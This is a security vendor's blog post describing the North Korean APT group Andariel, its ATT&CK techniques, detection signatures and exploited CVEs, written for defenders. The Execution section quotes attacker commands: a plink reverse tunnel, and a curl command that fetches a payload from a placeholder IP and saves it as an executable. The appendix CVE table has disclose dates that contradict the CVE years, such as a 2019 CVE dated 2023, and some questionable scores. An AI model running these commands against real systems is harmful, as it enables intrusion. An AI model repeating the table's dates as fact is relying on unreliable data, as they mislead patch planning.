Resources | Picus Security

Andariel: North Korean APT Group Targets Military and Nuclear Programs

Written by Huseyin Can YUCEEL | Jul 26, 2024 4:02:30 PM

On July 25th, 2024, The Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on a state-sponsored North Korean APT group, Andariel [1]. Andariel, also known as Onyx Sleet, is associated with the RGB 3rd Bureau of North Korea and they have previously conducted destructive attacks but have now shifted towards engaging in specialized cyber espionage and ransomware operations.

In this blog post, we explained the tools and techniques used by Andariel and how organizations can defend themselves against the North Korean APT group.

Andariel: The North Korean State-Sponsored APT Group

Andariel, also known as Onyx Sleet, is an Advanced Persistent Threat (APT) that has been associated with North Korea's Reconnaissance General Bureau (RGB) based in Pyongyang and Sinuiju. Andariel has been active since 2013, and the group gained infamy with the Sony Pictures hack in 2014. 

Andariel's motivations are aligned with the North Korean political agenda and the APT group primarily targets defense, aerospace, nuclear, and engineering organizations for cyber espionage. Additionally, they run ransomware operations against healthcare organizations in the US to fund their operations. 

The North Korean APT group utilizes a range of tactics, including spear phishing and vulnerability exploitation against web servers to infiltrate targeted organizations. After the initial foothold, they use known system discovery and enumeration techniques and establish persistence by deploying webshells and scheduled tasks. Adversaries also utilize custom malware, remote access tools (RATs), and open-source tools for lateral movement and data exfiltration.  

Tactics, Techniques, and Procedures (TTPs) used by Andariel

Initial Access

T1190 - Exploit Public-Facing Application

Andariel uses known and critical vulnerabilities to gain initial access to target networks. Although these vulnerabilities were disclosed with respective patches a long time ago, the unpatched assets still pose significant risks to organizations. The list of exploited vulnerabilities can be seen in the Appendix.

Execution

T1059 - Command and Scripting Interpreter

Adversaries abuse native tools and processes such as Windows Command Line, PowerShell, and WMI in compromised systems to execute their malicious actions without raising suspicion. This technique is also called Living-off-the-Land. Some of the example commands are given below.

netstat -naop
netstat -noa

systeminfo | findstr Logon


pvhost.exe -N -R [IP Address]:[Port] -P [Port] -l [username] -pw [password] <Remote_IP>

curl hxxp[://][IP Address]/tmp/tmp/comp[.]dat -o c:\users\public\notify[.]exe

Defense Evasion

T1027 Obfuscated Files or Information

The North Korean threat actors use VMProtect and Themida to pack their malicious tools. The resulting files often have file section names such as vmp0 and vmp1. This obfuscation technique makes detection and debugging harder for security teams.

Credential Access

T1003 Credential Dumping

Andariel uses publicly available tools such as Mimikatz, ProcDump, and Dumpert to access the Active Directory domain database by targeting NTDS.dit files. After dumping credentials, adversaries crack them offline and obtain clear-text passwords for valid accounts.

Discovery

T1087 Account Discovery

Adversaries use a command-line tool called AdFind to gather information from the Active Directory. This tool allows threat actors to get a list of valid accounts, usernames, and email addresses within the compromised network.

T1083 File and Directory Discovery

The threat actors use a custom .NET tool to enumerate files and directories in the compromised hosts. The tool collects information such as starting path, name, last write time, last access time, creation time, size, and attributes from each drive targeted on the host.

Lateral Movement

T1021 Remote Services

Adversaries use remote services such as telnet, SSH, VNC, RDP, SMB to interact with remote systems. Additionally, compromised valid accounts allows them to move laterally within the compromised network.

Command and Control 

T1071 Application Layer Protocol

Adversaries use the HTTP protocol to blend their C2 activity with the usual network traffic. This technique allows them to appear as benign traffic and evade detection by security controls.

T1090 Proxy & T1572 Protocol Tunneling

Andariel uses tools like 3Proxy, PLINK, and Stunnel to tunnel their traffic over various protocols from compromised hosts to C2 servers. 

Exfiltration

T1567 Exfiltration Over Web Service

Instead of directly communicating with their C2 servers, threat actors use web services and cloud storage services to exfiltrate data from compromised networks.

T1048 Exfiltration Over Alternative Protocol

Andariel uses PuTTY and WinSCP to exfiltrate data to their servers via File Transfer Protocol (FTP).

How Picus Helps Simulate Andariel Attacks?

We also strongly suggest simulating Andariel attacks to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other state-sponsored threat actors, such as APT40, Lazarus, and Volt Typhoon, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Andariel aka Onyx Sleet

Threat ID

Threat Name

Attack Module

38883

Andariel Threat Group Campaign 2023

Windows Endpoint

56407

Andariel Threat Group Campaign Backdoor Malware Download Threat

Network Infiltration

41382

Andariel Threat Group Campaign Backdoor Malware Email Threat

Email Infiltration (Phishing)

76699

Andariel Threat Group Campaign Malware Downloader Download Threat

Network Infiltration

88521

Andariel Threat Group Campaign Ransomware Download Threat

Network Infiltration

38855

Andariel Threat Group Campaign Ransomware Email Threat

Email Infiltration (Phishing)

93568

Andariel Threat Group Campaign Malware Downloader Email Threat

Email Infiltration (Phishing)

37270

Andariel Threat Group Campaign RAT Download Threat

Network Infiltration

30592

Andariel Threat Group Campaign RAT Email Threat

Email Infiltration (Phishing)

76162

Lilith RAT Download Threat

Network Infiltration

36694

Lilith RAT Email Threat

Email Infiltration (Phishing)

47956

Yamabot RAT Download Threat

Network Infiltration

23158

Yamabot RAT Email Threat

Email Infiltration (Phishing)

33583

Atharvan Backdoor Malware Download Threat

Network Infiltration

24167

Atharvan Backdoor Malware Email Threat

Email Infiltration (Phishing)

38967

TigerRAT RAT Download Threat

Network Infiltration

77704

TigerRAT RAT Email Threat

Email Infiltration (Phishing)

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address malware and vulnerabilities exploited by the Andariel (Onyx Sleet) group in preventive security controls. Currently, Picus Labs validated the following signatures for Andariel APT Group:

Security Control

Signature ID

Signature Name

CheckPoint

0DA0DE0F0

TS_APT.Win32.Lazarus.TC.2b7bkEkG

CheckPoint

0C6CB1FF8

Trojan.Win32.Ransomware.Win32.Custom.TC.4999V

CheckPoint

09A3A83C9

Backdoor.Win32.Andariel.TC.f79eWHdC

CheckPoint

0AE871AFF

Backdoor.Win32.Andariel.TC.f7f0Gdlj

CheckPoint

08974D9A1

TS_APT.Win32.Lazarus.TC.739efHbg

CheckPoint

0FCD3CDFF

Trojan.Win32.Generic.Win32.Generic.TC.f14dLxvv

CheckPoint

0F54522EE

Trojan.Win32.Generic.TC.89abRAvr

CheckPoint

0896BA266

Trojan.Win32.Imphash.TC.146bNnUc

CheckPoint

0D53F5CE5

Ransomware.Win32.HelloKitty.TC.2febTLgq

CheckPoint

0DDEDEB11

HEUR:Trojan.Win32.Mikey.TC.3c83rvQA

CheckPoint

09A75653F

HEUR:Trojan.Win32.Mikey.TC.62aeGoGy

CheckPoint

09378C88A

Trojan.Win32.Imphash.TC.1bd6Kdgd

CheckPoint

0B17077B7

Backdoor.Win32.TigerRat.TC.3ac2gJvN

Cisco FirePower

 

W32.79E15CC02C-95.SBX.TG

Cisco FirePower

 

W32.5C2F339362.in12.Talos

Cisco FirePower

 

W32.Auto:1177105e51.in03.Talos

Cisco FirePower

 

W32.Auto:b59e8f4482.in03.Talos

Cisco FirePower

 

GenericKD:TROJ_GEN-tpd

Cisco FirePower

 

TROJ_GEN:TrojanX-tpd

Cisco FirePower

 

W32.Auto:8daa6b.in03.Talos

Cisco FirePower

 

W32.Auto:3098e6.in03.Talos

Cisco FirePower

 

W32.Auto:ce534eb8de.in03.Talos

Cisco FirePower

 

W32.Auto:c3c0cf.in03.Talos

Cisco FirePower

 

W32.Auto:8b3c8046fa.in03.Talos

Cisco FirePower

 

W32.FEC82F2542.in12.Talos

Cisco FirePower

 

W32.Auto:4aadf76749.in03.Talos

Cisco FirePower

 

W32.868A62FEFF-100.SBX.VIOC

Cisco FirePower

 

W32.C2500A6E12.in12.Talos

Cisco FirePower

 

W32.9F90670D21.in12.Talos

ForcePoint NGFW

 

File_Malware-Blocked

ForcePoint NGFW

 

File-OLE_Malicious-Looking-Document

Fortigate AV

62183

PossibleThreat

Fortigate AV

6945573

Adware/HiddenInstall

Fortigate AV

8173658

PossibleThreat.MU

Fortigate AV

10021613

W64/NukeSped.HD!tr

Fortigate AV

10125033

MSIL/Agent_AGen.AOS!tr

Fortigate AV

10003277

VBA/Agent.UOE!tr

Fortigate AV

8187637

W32/AI.Pallas.Suspicious

Fortigate AV

10036457

W32/Filecoder.OHM!tr

Palo Alto

459572261

trojan/Win32 EXE.xnet.ae

Palo Alto

413328855

trojan/Win32 EXE.malware.axun

Palo Alto

618815202

trojan/Win32.tigerrat.c

Palo Alto

602811585

trojan/Win32.susgen.apt

Palo Alto

459168833

trojan/Win32 EXE.xnet.ad

Palo Alto

459572168

trojan/Win32.nukesped.l

Palo Alto

413338881

trojan/Win32 EXE.artemis.aixp

Palo Alto

615485823

trojan/Win32.heur2.en

Palo Alto

413245182

trojan/MS WORD.valyria.ono

Palo Alto

408136170

trojan/Win32 EXE.siggen.aat

Palo Alto

459168818

Program/Win32.multiverze.a

Palo Alto

408041781

trojan/Win32 EXE.siggen.xl

Palo Alto

413246292

trojan/Win32 EXE.hiddeninstall.dq

Palo Alto

601781334

trojan/Win32.andardoor.b

Palo Alto

580706583

Trojan/Win32.tiggre.vcj

Palo Alto

618815202

trojan/Win32.tigerrat.c

Snort

3.13469.13

FILE-OFFICE Microsoft Word ole stream memory corruption attempt

Snort

1.2019837.2

ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)

Trellix

0x4840c900

MALWARE: Malicious File Detected by GTI

Start simulating emerging threats today and get actionable mitigation insights with a  14-day free trial of the Picus Security Validation Platform.

References

[1] "North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime's Military and Nuclear Programs," Cybersecurity and Infrastructure Security Agency CISA. [Online]. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a

Appendix

The list below shows known and critical vulnerabilities exploited by Andariel. Using the Picus Security Validation Platform, you can validate your security controls against Andariel's vulnerability exploitation attacks. 

Product

Vulnerability

CVSS Score

Disclose Date

Apache ActiveMQ

CVE-2023-46604

9.8 (Critical)

15 May 2023

JetBrains TeamCity

CVE-2023-42793

9.8 (Critical)

26 May 2023

Citrix NetScaler

CVE-2023-3519

9.8 (Critical)

24 May 2023

Ivanti Endpoint Manager Mobile (EPMM)

CVE-2023-35078

9.8 (Critical)

24 May 2023

Progress MOVEit Transfer

CVE-2023-34362

9.8 (Critical)

24 May 2023

Apache RocketMQ

CVE-2023-33246

9.8 (Critical)

24 May 2023

KeePass

CVE-2023-32784

7.5 (High)

13 Jun 2023

Openfire

CVE-2023-32315

7.5 (High)

7 Mar 2023

Google Chromium V8 Type Confusion

CVE-2023-3079

9.8 (Critical)

18 Apr 2023

Zyxel ZyWALL/USG series firmware

CVE-2023-28771

9.8 (Critical)

6 Feb 2023

Zyxell ATP series firmware

CVE-2023-33010

9.8 (Critical)

18 Jan 2023

Barracuda Email Security Gateway

CVE-2023-2868

9.8 (Critical)

25 Sep 2022

FortiGate SSL VPN

CVE-2023-27997

9.8 (Critical)

20 Apr 2022

Apache HTTP Server

CVE-2023-25690

9.8 (Critical)

1 Jun 2022

Oracle Hospitality Opera 5

CVE-2023-21932

7.2 (High)

25 Feb 2022

GoAnywhere MFT

CVE-2023-0669

7.2 (High)

7 Feb 2023

Zoho ManageEngine

CVE-2022-47966

9.8 (Critical)

25 Apr 2022

Zimbra Collaboration Suite

CVE-2022-41352

9.8 (Critical)

4 Apr 2022

Zimbra Collaboration Suite

CVE-2022-27925

7.2 (High)

16 Feb 2022

Microsoft Windows Support Diagnostic Tool

CVE-2022-30190

7.8 (High)

16 Feb 2022

TP-LINK TL-WR840N

CVE-2022-25064

9.8 (Critical)

16 Feb 2022

TerraMaster NAS

CVE-2022-24990

7.5 (High)

1 Apr 2022

TerraMaster NAS

CVE-2021-45837

9.8 (Critical)

3 Mar 2022

Moment.js library

CVE-2022-24785

7.5 (High)

9 Feb 2022

PHP Everywhere

CVE-2022-24665

8.8 (High)

11 Jan 2022

PHP Everywhere

CVE-2022-24664

8.8 (High)

21 Feb 2022

PHP Everywhere

CVE-2022-24663

8.8 (High)

21 Feb 2022

Spring MVC and WebFlux

CVE-2022-22965

9.8 (Critical)

15 Dec 2021

Spring Cloud Gateway

CVE-2022-22947

10.0 (Critical)

15 Dec 2021

Microsoft SharePoint Server

CVE-2022-22005

8.8 (High)

15 Sep 2021

Win32k Elevation of Privilege

CVE-2022-21882

7.8 (High)

5 Oct 2021

Apache Log4j

CVE-2021-44228

8.8 (High)

22 Sep 2021

Samba vfs_fruit module

CVE-2021-44142

8.8 (High)

5 Jan 2021

Windows Common Log File System Driver

CVE-2021-43226

7.8 (High)

8 Dec 2021

Windows Common Log File System Driver

CVE-2021-43207

7.8 (High)

4 Aug 2021

Windows Common Log File System Driver

CVE-2021-36955

7.8 (High)

26 Aug 2019

Apache HTTP Server 2.4.49

CVE-2021-41773

7.5 (High)

25 Mar 2019

Talend ESB Runtime

CVE-2021-40684

9.1 (Critical)

16 May 2019

IPeakCMS 3.5

CVE-2021-3018

9.8 (Critical)

5 Jan 2018

SMA100 Apache httpd server (SonicWall)

CVE-2021-20038

9.8 (Critical)

15 May 2023

SonicWall Secure Remote Access (SRA)

CVE-2021-20028

9.8 (Critical)

26 May 2023

Tableau Server, Desktop, and Public Desktop

CVE-2019-15637

8.1 (High)

24 May 2023

Kibana

CVE-2019-7609

10.0 (Critical)

24 May 2023

Microsoft Remote Desktop Services

CVE-2019-0708

9.8 (Critical)

24 May 2023

VMware V4H and V4PA

CVE-2017-4946

7.8 (High)

24 May 2023